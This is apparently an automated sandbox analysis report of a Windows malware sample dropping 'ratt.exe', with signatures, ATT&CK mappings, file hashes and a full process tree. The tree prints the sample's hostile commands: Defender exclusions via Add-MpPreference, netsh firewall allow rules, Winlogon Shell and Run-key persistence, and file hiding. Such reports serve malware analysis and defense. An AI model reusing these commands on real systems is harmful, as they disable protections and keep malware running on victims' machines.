e5aa35d2480e58e2b63e14ef64374728d931423cd3f530cb43a107ca4c2a93aa

Analysis

max time kernel
32s
max time network
145s
platform
windows10-2004_x64
resource
win10v2004-20230915-en
resource tags

arch:x64arch:x86image:win10v2004-20230915-enlocale:en-usos:windows10-2004-x64system
submitted
21/09/2023, 06:18

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

990e4a37aa2c639c582f884fd3430063.exe
Size

1.4MB
MD5

990e4a37aa2c639c582f884fd3430063
SHA1

7b272d8dbead6130f66d6c66b3c9d80d24a4486e
SHA256

e5aa35d2480e58e2b63e14ef64374728d931423cd3f530cb43a107ca4c2a93aa
SHA512

5c1a590cdc3e7beecc0d48f74f417ab4c40afdbab90e02240979a0ffcb86e0f284784857c286d291a2334071d58e1c20a19d7c5bf15bdc59e398e26d3c290748
SSDEEP

24576:U2G/nvxW3Ww0tRp8GiXTBhq7yRDvHcUcjUvy0lr3Tl6icOB/UWoT:UbA30H4zF0UMSAicOB/UWk

Score

8^/10

evasion upx

Malware Config

Signatures

Modifies Windows Firewall 1 TTPs 2 IoCs

evasion

Windows Service

T1543.003

pid	Process
1204	netsh.exe
4500	netsh.exe

ACProtect 1.3x - 1.4x DLL software 2 IoCs

Detects file using ACProtect software.

resource	yara_rule
behavioral2/files/0x000a000000023253-107.dat	acprotect
behavioral2/files/0x000a000000023253-106.dat	acprotect

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-1141987721-3945596982-3297311814-1000\Control Panel\International\Geo\Nation	990e4a37aa2c639c582f884fd3430063.exe

Executes dropped EXE 1 IoCs

pid	Process
4000	7z.exe

Loads dropped DLL 1 IoCs

pid	Process
4000	7z.exe

UPX packed file 7 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/memory/4000-104-0x0000000000400000-0x0000000000432000-memory.dmp	upx
behavioral2/files/0x0007000000023256-105.dat	upx
behavioral2/files/0x0007000000023256-103.dat	upx
behavioral2/files/0x000a000000023253-107.dat	upx
behavioral2/files/0x000a000000023253-106.dat	upx
behavioral2/memory/4000-108-0x0000000010000000-0x00000000100E2000-memory.dmp	upx
behavioral2/memory/4000-112-0x0000000000400000-0x0000000000432000-memory.dmp	upx

Unexpected DNS network traffic destination 3 IoCs

Network traffic to other servers than the configured DNS servers was detected on the DNS port.

description	ioc
Destination IP	208.67.222.222
Destination IP	208.67.222.222
Destination IP	208.67.222.222

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Runs ping.exe 1 TTPs 4 IoCs

Remote System Discovery

T1018

pid	Process
4880	PING.EXE
1488	PING.EXE
1164	PING.EXE
3844	PING.EXE

Suspicious behavior: EnumeratesProcesses 12 IoCs

pid	Process
4200	powershell.exe
4200	powershell.exe
2632	powershell.exe
2632	powershell.exe
3380	powershell.exe
3380	powershell.exe
4312	powershell.exe
4312	powershell.exe
928	powershell.exe
928	powershell.exe
4220	powershell.exe
4220	powershell.exe

Suspicious use of AdjustPrivilegeToken 48 IoCs

description	pid	Process
Token: SeIncreaseQuotaPrivilege	2320	WMIC.exe
Token: SeSecurityPrivilege	2320	WMIC.exe
Token: SeTakeOwnershipPrivilege	2320	WMIC.exe
Token: SeLoadDriverPrivilege	2320	WMIC.exe
Token: SeSystemProfilePrivilege	2320	WMIC.exe
Token: SeSystemtimePrivilege	2320	WMIC.exe
Token: SeProfSingleProcessPrivilege	2320	WMIC.exe
Token: SeIncBasePriorityPrivilege	2320	WMIC.exe
Token: SeCreatePagefilePrivilege	2320	WMIC.exe
Token: SeBackupPrivilege	2320	WMIC.exe
Token: SeRestorePrivilege	2320	WMIC.exe
Token: SeShutdownPrivilege	2320	WMIC.exe
Token: SeDebugPrivilege	2320	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2320	WMIC.exe
Token: SeRemoteShutdownPrivilege	2320	WMIC.exe
Token: SeUndockPrivilege	2320	WMIC.exe
Token: SeManageVolumePrivilege	2320	WMIC.exe
Token: 33	2320	WMIC.exe
Token: 34	2320	WMIC.exe
Token: 35	2320	WMIC.exe
Token: 36	2320	WMIC.exe
Token: SeIncreaseQuotaPrivilege	2320	WMIC.exe
Token: SeSecurityPrivilege	2320	WMIC.exe
Token: SeTakeOwnershipPrivilege	2320	WMIC.exe
Token: SeLoadDriverPrivilege	2320	WMIC.exe
Token: SeSystemProfilePrivilege	2320	WMIC.exe
Token: SeSystemtimePrivilege	2320	WMIC.exe
Token: SeProfSingleProcessPrivilege	2320	WMIC.exe
Token: SeIncBasePriorityPrivilege	2320	WMIC.exe
Token: SeCreatePagefilePrivilege	2320	WMIC.exe
Token: SeBackupPrivilege	2320	WMIC.exe
Token: SeRestorePrivilege	2320	WMIC.exe
Token: SeShutdownPrivilege	2320	WMIC.exe
Token: SeDebugPrivilege	2320	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2320	WMIC.exe
Token: SeRemoteShutdownPrivilege	2320	WMIC.exe
Token: SeUndockPrivilege	2320	WMIC.exe
Token: SeManageVolumePrivilege	2320	WMIC.exe
Token: 33	2320	WMIC.exe
Token: 34	2320	WMIC.exe
Token: 35	2320	WMIC.exe
Token: 36	2320	WMIC.exe
Token: SeDebugPrivilege	4200	powershell.exe
Token: SeDebugPrivilege	2632	powershell.exe
Token: SeDebugPrivilege	3380	powershell.exe
Token: SeDebugPrivilege	4312	powershell.exe
Token: SeDebugPrivilege	928	powershell.exe
Token: SeDebugPrivilege	4220	powershell.exe

Suspicious use of WriteProcessMemory 36 IoCs

description	pid	Process	procid_target
PID 3592 wrote to memory of 1608	3592	990e4a37aa2c639c582f884fd3430063.exe	83
PID 3592 wrote to memory of 1608	3592	990e4a37aa2c639c582f884fd3430063.exe	83
PID 3592 wrote to memory of 1608	3592	990e4a37aa2c639c582f884fd3430063.exe	83
PID 1608 wrote to memory of 4488	1608	cmd.exe	86
PID 1608 wrote to memory of 4488	1608	cmd.exe	86
PID 1608 wrote to memory of 4488	1608	cmd.exe	86
PID 4488 wrote to memory of 2988	4488	cmd.exe	87
PID 4488 wrote to memory of 2988	4488	cmd.exe	87
PID 4488 wrote to memory of 2988	4488	cmd.exe	87
PID 1608 wrote to memory of 3080	1608	cmd.exe	88
PID 1608 wrote to memory of 3080	1608	cmd.exe	88
PID 1608 wrote to memory of 3080	1608	cmd.exe	88
PID 3080 wrote to memory of 2320	3080	cmd.exe	89
PID 3080 wrote to memory of 2320	3080	cmd.exe	89
PID 3080 wrote to memory of 2320	3080	cmd.exe	89
PID 1608 wrote to memory of 4200	1608	cmd.exe	91
PID 1608 wrote to memory of 4200	1608	cmd.exe	91
PID 1608 wrote to memory of 4200	1608	cmd.exe	91
PID 1608 wrote to memory of 2632	1608	cmd.exe	92
PID 1608 wrote to memory of 2632	1608	cmd.exe	92
PID 1608 wrote to memory of 2632	1608	cmd.exe	92
PID 1608 wrote to memory of 3380	1608	cmd.exe	93
PID 1608 wrote to memory of 3380	1608	cmd.exe	93
PID 1608 wrote to memory of 3380	1608	cmd.exe	93
PID 1608 wrote to memory of 4312	1608	cmd.exe	94
PID 1608 wrote to memory of 4312	1608	cmd.exe	94
PID 1608 wrote to memory of 4312	1608	cmd.exe	94
PID 1608 wrote to memory of 928	1608	cmd.exe	95
PID 1608 wrote to memory of 928	1608	cmd.exe	95
PID 1608 wrote to memory of 928	1608	cmd.exe	95
PID 1608 wrote to memory of 4000	1608	cmd.exe	96
PID 1608 wrote to memory of 4000	1608	cmd.exe	96
PID 1608 wrote to memory of 4000	1608	cmd.exe	96
PID 1608 wrote to memory of 4220	1608	cmd.exe	97
PID 1608 wrote to memory of 4220	1608	cmd.exe	97
PID 1608 wrote to memory of 4220	1608	cmd.exe	97

Views/modifies file attributes 1 TTPs 1 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
2124	attrib.exe

C:\Users\Admin\AppData\Local\Temp\990e4a37aa2c639c582f884fd3430063.exe
"C:\Users\Admin\AppData\Local\Temp\990e4a37aa2c639c582f884fd3430063.exe"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3592
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\ratt.bat" "
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1608
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c nslookup myip.opendns.com. resolver1.opendns.com
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4488
  - - C:\Windows\SysWOW64\nslookup.exe
      nslookup myip.opendns.com. resolver1.opendns.com
      4⤵
      PID:2988
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic ComputerSystem get Domain
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3080
  - - C:\Windows\SysWOW64\Wbem\WMIC.exe
      wmic ComputerSystem get Domain
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:2320
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    Powershell -Command 'Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\ratt.exe"'
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4200
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    Powershell -Command 'Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\"'
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2632
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    Powershell -Command 'Add-MpPreference -ExclusionPath "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\ratt.exe"'
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:3380
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    Powershell -Command 'Add-MpPreference -ExclusionPath "$Env:SystemDrive\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp"'
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4312
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    Powershell -Command 'Add-MpPreference -ExclusionProcess "C:\Users\Admin\AppData\Local\Temp\ratt.exe"'
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:928
- - C:\Users\Admin\AppData\Local\Temp\7z.exe
    7z.exe x -o"C:\Users\Admin\AppData\Local\Temp" -y ratt.7z
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    PID:4000
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    powershell -executionpolicy RemoteSigned -WindowStyle Hidden -file Add.ps1
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4220
  - - C:\Windows\SysWOW64\netsh.exe
      "C:\Windows\system32\netsh.exe" advfirewall firewall add rule name=SecuritySystem dir=in action=allow "program=C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ratt.exe" enable=yes
      4⤵
      Modifies Windows Firewall
      PID:1204
  - - C:\Windows\SysWOW64\netsh.exe
      "C:\Windows\system32\netsh.exe" advfirewall firewall add rule name=SecuritySystem dir=out action=allow "program=C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ratt.exe" enable=yes
      4⤵
      Modifies Windows Firewall
      PID:4500
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\system32\cmd.exe"
      4⤵
      PID:4036
    - - C:\Windows\SysWOW64\Wbem\WMIC.exe
        
        wmic computersystem where name="HFPAJDPV" set AutomaticManagedPagefile=False
        5⤵
        
        PID:1396
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\system32\cmd.exe"
      4⤵
      PID:3888
    - - C:\Windows\SysWOW64\Wbem\WMIC.exe
        
        wmic pagefileset where name="C:\\pagefile.sys" set InitialSize=15000,MaximumSize=20000
        5⤵
        
        PID:4504
  - - C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ratt.exe
      "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ratt.exe"
      4⤵
      PID:4200
    - - C:\Windows\SysWOW64\cmd.exe
        
        "cmd" /c ping 127.0.0.1 -n 7 > nul && REG ADD "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /f /v "Shell" /t REG_SZ /d "explorer.exe,C:\Users\Admin\Music\rot.exe,"
        5⤵
        
        PID:2084
      - C:\Windows\SysWOW64\PING.EXE
        
        ping 127.0.0.1 -n 7
        6⤵
        Runs ping.exe
        
        PID:1488
      - C:\Windows\SysWOW64\reg.exe
        
        REG ADD "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /f /v "Shell" /t REG_SZ /d "explorer.exe,C:\Users\Admin\Music\rot.exe,"
        6⤵
        
        PID:784
    - - C:\Windows\SysWOW64\cmd.exe
        
        "cmd" /c ping 127.0.0.1 -n 20 > nul && copy "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ratt.exe" "C:\Users\Admin\Music\rot.exe" && ping 127.0.0.1 -n 20 > nul && "C:\Users\Admin\Music\rot.exe"
        5⤵
        
        PID:1740
      - C:\Windows\SysWOW64\PING.EXE
        
        ping 127.0.0.1 -n 20
        6⤵
        Runs ping.exe
        
        PID:1164
  - - C:\Windows\SysWOW64\attrib.exe
      "C:\Windows\system32\attrib.exe" +h "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ratt.exe"
      4⤵
      Views/modifies file attributes
      PID:2124
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "ratt" /t REG_SZ /d "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\ratt.exe" /F
    3⤵
    PID:4028
- - C:\Users\Admin\AppData\Local\Temp\ratt.exe
    "ratt.exe"
    3⤵
    PID:2968
  - - C:\Windows\SysWOW64\cmd.exe
      "cmd" /c ping 127.0.0.1 -n 17 > nul && copy "C:\Users\Admin\AppData\Local\Temp\ratt.exe" "C:\Users\Admin\Music\rot.exe" && ping 127.0.0.1 -n 17 > nul && "C:\Users\Admin\Music\rot.exe"
      4⤵
      PID:2272
    - - C:\Windows\SysWOW64\PING.EXE
        
        ping 127.0.0.1 -n 17
        5⤵
        Runs ping.exe
        
        PID:4880
    - - C:\Users\Admin\Music\rot.exe
        
        "C:\Users\Admin\Music\rot.exe"
        5⤵
        
        PID:448
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
        6⤵
        
        PID:4436
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
        6⤵
        
        PID:2148
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
        6⤵
        
        PID:2464
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
        6⤵
        
        PID:1216

C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1 -n 17
1⤵
- Runs ping.exe
PID:3844

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Create or Modify System Process

T1543

Windows Service

T1543.003

Privilege Escalation

Create or Modify System Process

T1543

Windows Service

T1543.003

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Credential Access

Discovery

Query Registry

T1012

Remote System Discovery

T1018

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ratt.exe

Filesize
122.1MB

MD5
6701d9d327bfd24485e83f9a8fd07208

SHA1
4944534e2e53b981b56680d085261a32f2be7503

SHA256
7a4259015f96c0dcf7be03ae0624f138d3779a78d8694ea807034e8c12df80b8

SHA512
96a2f47dcfb7c5eda28edd77f6658a365c2e79f9d91e6ac68a0864e056b1f8740fb66a7ebf40c0aabcd607ef1a15dbb546065fd7bfc8e5505d1f612a12bb8f7f

Download Submit
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ratt.exe

Filesize
115.2MB

MD5
b8ab769fcfb672ee015a43e1135ce7af

SHA1
202ff75bfc17894ebfeba7a6ad60f802feafacc2

SHA256
2b8fcf2daa74ca2a1e8066a9e400ca31bb5a36b8581a289c6787b3a599041f9f

SHA512
6204c9d7e5f1fe5e5b73787065f0fc7a166ac95547f2cca94237c26eaa7adb7070ea3c44c92731f4d02c8c19a4be870cf0263880d50a06a321ecccbd8da46260

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

Filesize
1KB

MD5
33b19d75aa77114216dbc23f43b195e3

SHA1
36a6c3975e619e0c5232aa4f5b7dc1fec9525535

SHA256
b23ced31b855e5a39c94afa1f9d55b023b8c40d4dc62143e0539c6916c12c9d2

SHA512
676fa2fd34878b75e5899197fe6826bb5604541aa468804bc9835bd3acabed2e6759878a8f1358955413818a51456816e90f149133828575a416c2a74fc7d821

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\ratt.exe.log

Filesize
1KB

MD5
9a2d0ce437d2445330f2646472703087

SHA1
33c83e484a15f35c2caa3af62d5da6b7713a20ae

SHA256
30ea2f716e85f8d14a201e3fb0897d745a01b113342dfb7a9b7ac133c4ef150c

SHA512
a61d18d90bfad9ea8afdfa37537cfea3d5a3d0c161e323fa65840c283bdc87c3de85daaff5519beea2f2719eec1c68398eea8679b55ff733a61052f073162d5d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
11KB

MD5
6e45067bc15acf51e635f777de28f2c7

SHA1
4f3f841845cf13e3ee01aec1fa6c4e2c48a99452

SHA256
715591c2b9436d595c815b0470bea2ca12eb165a71f3fb03cd080c8701727cfe

SHA512
f8160ecebc47067f1632552349533d5be6b5cfb6856b09e6a6fc90b459f9f034ba6a80e6e2ebe0aa69d48972db6d867df3dae22d57e8fcb4f90864710fbc964e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
11KB

MD5
10b51b4c9573b855f63bd7580325c11d

SHA1
b297fa4d12b3726e648d8e3742a03ba05b796642

SHA256
254cad9935a22e1d71826ff5863f341f2163a048c14187c5419f8152cf430a0f

SHA512
a9e1121a7bfa8e7883743864c812dd111511356c53a629038c843a58f8541482fa44eba48f5ad51a9427e15fe08f6f583c2960abe49758114d9bc3eafd4a6538

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
11KB

MD5
2d5a41b5bc754f966ee21ebc5efe9d8c

SHA1
041707f48cb6bca7de1d1d846dba376db65442ff

SHA256
cd273b46425637f43fd37f9a672a624d03fc5428a2188d050bd915c6abb10ce9

SHA512
0cf9ba3cea73de9f159bcd47b9f83b4b6c54eacc153c1db0de154f6bbd5f0f6c3ad7bed76be9fb079db7d50fab171e2879c89d74c387390a5d7bebcee3269c70

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
11KB

MD5
8a1fbff87922833c4ec9951274173cf8

SHA1
db3c7e605d3a8bd33b58e1c498dc2f306c156b71

SHA256
4031210db2cc08790bd39b28083096261e2484f9ad3394171d36c99eaaf65de6

SHA512
ff428a1dd8c26e98e6e08cb5022761b47e6916237069a092d1443dc08589d2ab26461ae5fb35c736ff1cebe5a01ec9b3a0651290420bcc083621a22f25635521

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
11KB

MD5
8b4be6069f5b7109d2851da16b2515cd

SHA1
0693679e96ed2713a0c3dd495c18e78b2eb17139

SHA256
67ebdddfbd4fdf7a579a5529f4ea70bffe8b8d4184a4b6b2354aa9a49d8e4c51

SHA512
ae2921559bfb0b28ed8bf4dac79067914f18a897113f7405b2cafc2cbb52dc4ddc8c1b41519523a35c7702e26e98b745a6fb832ec7c04422c495e3087beb771e

Download Submit
C:\Users\Admin\AppData\Local\Temp\7z.dll

Filesize
328KB

MD5
15bbbe562f9be3e5dcbb834e635cc231

SHA1
7c01cf5fa4db2312c5ed2f7b8c41e3e5c346a51a

SHA256
ed50ef8e0b6dd83fb0c3f733329d4aa6e5a3beb3491e2ba9d2ae206813508dde

SHA512
769287951b8c16f4b10c1b58e82612844babe7b5c10445fe848d713fb5e8321bcbbd9780e9c564cffe35ea4144e8a7e19645291c4eea372fcaa19ae395a97287

Download Submit
C:\Users\Admin\AppData\Local\Temp\7z.dll

Filesize
328KB

MD5
15bbbe562f9be3e5dcbb834e635cc231

SHA1
7c01cf5fa4db2312c5ed2f7b8c41e3e5c346a51a

SHA256
ed50ef8e0b6dd83fb0c3f733329d4aa6e5a3beb3491e2ba9d2ae206813508dde

SHA512
769287951b8c16f4b10c1b58e82612844babe7b5c10445fe848d713fb5e8321bcbbd9780e9c564cffe35ea4144e8a7e19645291c4eea372fcaa19ae395a97287

Download Submit
C:\Users\Admin\AppData\Local\Temp\7z.exe

Filesize
71KB

MD5
8ba2e41b330ae9356e62eb63514cf82e

SHA1
8dc266467a5a0d587ed0181d4344581ef4ff30b2

SHA256
ea2ad8d87b79c8eb3952498c7005a195986436cfd7ca7736dbbdda979142daea

SHA512
2fdfc2d368c70320b3dac00fef06381ef90a2a82a1f3137109b033d84e5b70185039af6ec918012dc03bc9d046cd8d8aee3247ba0f59d394e78f1f73380f7a1d

Download Submit
C:\Users\Admin\AppData\Local\Temp\7z.exe

Filesize
71KB

MD5
8ba2e41b330ae9356e62eb63514cf82e

SHA1
8dc266467a5a0d587ed0181d4344581ef4ff30b2

SHA256
ea2ad8d87b79c8eb3952498c7005a195986436cfd7ca7736dbbdda979142daea

SHA512
2fdfc2d368c70320b3dac00fef06381ef90a2a82a1f3137109b033d84e5b70185039af6ec918012dc03bc9d046cd8d8aee3247ba0f59d394e78f1f73380f7a1d

Download Submit
C:\Users\Admin\AppData\Local\Temp\Add.ps1

Filesize
1KB

MD5
0df43097e0f0acd04d9e17fb43d618b9

SHA1
69b3ade12cb228393a93624e65f41604a17c83b6

SHA256
c8e4a63337a25f55f75ad10ab2b420d716bad4b35a2044fd39dcd5936419d873

SHA512
01ae71dd2ee040baad6f4b9afcfbaeca2b9f6cc7d60ade5de637238d65c17d74292734666f4ae6b533f6bf1007c46387d8e690d97c3b7a535bcd6f216e70c4fb

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_mzosywzl.d1r.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\ratt.7z

Filesize
693KB

MD5
7de6fdf3629c73bf0c29a96fa23ae055

SHA1
dcb37f6d43977601c6460b17387a89b9e4c0609a

SHA256
069979bfb2aefe3cac239fe4f2477672eb75b90c9853fb67b2ac1438f2ec44ff

SHA512
d1ef2299aacf429572fd6df185009960e601e49126f080fdced26ec407e5db86eaa902e474635464aac146b7de286667a398f2c5e46c4a821dad2579bfb3acf8

Download Submit
C:\Users\Admin\AppData\Local\Temp\ratt.bat

Filesize
1KB

MD5
7ea1fec84d76294d9256ae3dca7676b2

SHA1
1e335451d1cbb6951bc77bf75430f4d983491342

SHA256
9a419095c0bafc6b550f3f760c7b4f91ef3a956cfa6403d3750164ecdbe35940

SHA512
ab712c45081b3d1c7edd03e67a8db1518a546f3fbf00e99838dfe03a689c4867a6953e6603dcd2be458b2441f4a2b70286fd7d096549cfcf032dd2cd54d68317

Download Submit
C:\Users\Admin\AppData\Local\Temp\ratt.exe

Filesize
180.6MB

MD5
fcb92efaaa9c12fa210609d4cabde2da

SHA1
0ee84468f12538c6209686d528f33a9af35ff0d8

SHA256
587c2003e58a43b8b1c1bd70c953f9c9fe81cd99170d399274bfbe3e68cc589f

SHA512
951d52628cb2d81bed296efc33629982e303c30551833b3a8ce3a79aeff482d0308fda79c9a8b4df8a081f4c6a49c24574eabff0b16949eb72a92388a027bb1a

Download Submit
C:\Users\Admin\AppData\Local\Temp\ratt.exe

Filesize
106.4MB

MD5
ccdf1057b38a2a835096f80f12144a06

SHA1
1996e7f6da9bb18d5ae93755d520554d24db90d1

SHA256
1f2cdc56474c26ebd579ee294649a0830e339fe941fc46655aa6c82cb244c009

SHA512
1055dabd4b1ceb660670234871a84ed443537a4e876efff74f4c53073b684bb9a9e28abfbb0f2d8393b5e4bfcd9467c8938370c264032ea0fcebf408643c1df7

Download Submit
C:\Users\Admin\Music\rot.exe

Filesize
53.6MB

MD5
56f978509c345074fc3341811922ec0b

SHA1
1f99b6555e98a67718ba6afd05fbc3be3bf4072c

SHA256
18b5d36031a97ad48204668857e91cc994a58616eef991feb284571adba7ff8b

SHA512
cf07e7fa04633b6d4fdf21901bd3c9c77a9cc93a3588e71b644647fa1fd7589cedaf0d8158fe6125ff489cec7d36dc8aad99be1c64b5275ecf69928ed0f6f19d

Download Submit
C:\Users\Admin\Music\rot.exe

Filesize
36.0MB

MD5
0e9c5fd3e0bb3c0e631221a879fcf2bd

SHA1
9f68c01339aed60a640bc2e9488aaff006fdc696

SHA256
9046fe4b845183188d6808046ccaeeaa1222e27250ee26465dc082900fc29029

SHA512
d3171c70784e78d72abd051583684d5f85708a1d28e795b3eb85920c0d18699349a2ee89653c1c694f022c8ea848a63622f9509eb8361c6515d5e5fe660c82b2

Download Submit
C:\Users\Admin\Music\rot.exe

Filesize
37.1MB

MD5
37a236e42b2ccf60ed6a14e8b1bfb068

SHA1
4a95070bff1f9589f90ee318d9bbbcd0a27853e4

SHA256
9f42c257e4f07a507f2998e558142e7ec2efb5cc14853d49d1588ce98406dfc3

SHA512
01258f07ef6e137d494f0b2688823c5da55b17d9061a6d3cbc06bbf0215a1b89213ce29901f47cd9de3a7e5b617f80d5315fc378755ff2a409fecdea7917578c

Download Submit
memory/928-101-0x0000000074D80000-0x0000000075530000-memory.dmp

Filesize
7.7MB

Download
memory/928-100-0x0000000005120000-0x0000000005130000-memory.dmp

Filesize
64KB

Download
memory/928-88-0x0000000005120000-0x0000000005130000-memory.dmp

Filesize
64KB

Download
memory/928-87-0x0000000005120000-0x0000000005130000-memory.dmp

Filesize
64KB

Download
memory/928-86-0x0000000074D80000-0x0000000075530000-memory.dmp

Filesize
7.7MB

Download
memory/2632-53-0x0000000004D60000-0x0000000004D70000-memory.dmp

Filesize
64KB

Download
memory/2632-54-0x0000000074D80000-0x0000000075530000-memory.dmp

Filesize
7.7MB

Download
memory/2632-38-0x0000000074D80000-0x0000000075530000-memory.dmp

Filesize
7.7MB

Download
memory/2632-40-0x0000000004D60000-0x0000000004D70000-memory.dmp

Filesize
64KB

Download
memory/2632-39-0x0000000004D60000-0x0000000004D70000-memory.dmp

Filesize
64KB

Download
memory/2632-50-0x0000000005BA0000-0x0000000005EF4000-memory.dmp

Filesize
3.3MB

Download
memory/3380-56-0x0000000004800000-0x0000000004810000-memory.dmp

Filesize
64KB

Download
memory/3380-59-0x0000000005750000-0x0000000005AA4000-memory.dmp

Filesize
3.3MB

Download
memory/3380-70-0x0000000074D80000-0x0000000075530000-memory.dmp

Filesize
7.7MB

Download
memory/3380-55-0x0000000074D80000-0x0000000075530000-memory.dmp

Filesize
7.7MB

Download
memory/3380-69-0x0000000004800000-0x0000000004810000-memory.dmp

Filesize
64KB

Download
memory/4000-112-0x0000000000400000-0x0000000000432000-memory.dmp

Filesize
200KB

Download
memory/4000-108-0x0000000010000000-0x00000000100E2000-memory.dmp

Filesize
904KB

Download
memory/4000-104-0x0000000000400000-0x0000000000432000-memory.dmp

Filesize
200KB

Download
memory/4200-33-0x0000000002B90000-0x0000000002BA0000-memory.dmp

Filesize
64KB

Download
memory/4200-31-0x0000000006080000-0x000000000609E000-memory.dmp

Filesize
120KB

Download
memory/4200-36-0x0000000074D80000-0x0000000075530000-memory.dmp

Filesize
7.7MB

Download
memory/4200-15-0x0000000002B90000-0x0000000002BA0000-memory.dmp

Filesize
64KB

Download
memory/4200-14-0x0000000002A70000-0x0000000002AA6000-memory.dmp

Filesize
216KB

Download
memory/4200-32-0x00000000060B0000-0x00000000060FC000-memory.dmp

Filesize
304KB

Download
memory/4200-16-0x0000000002B90000-0x0000000002BA0000-memory.dmp

Filesize
64KB

Download
memory/4200-13-0x0000000074D80000-0x0000000075530000-memory.dmp

Filesize
7.7MB

Download
memory/4200-17-0x0000000005240000-0x0000000005868000-memory.dmp

Filesize
6.2MB

Download
memory/4200-18-0x00000000050C0000-0x00000000050E2000-memory.dmp

Filesize
136KB

Download
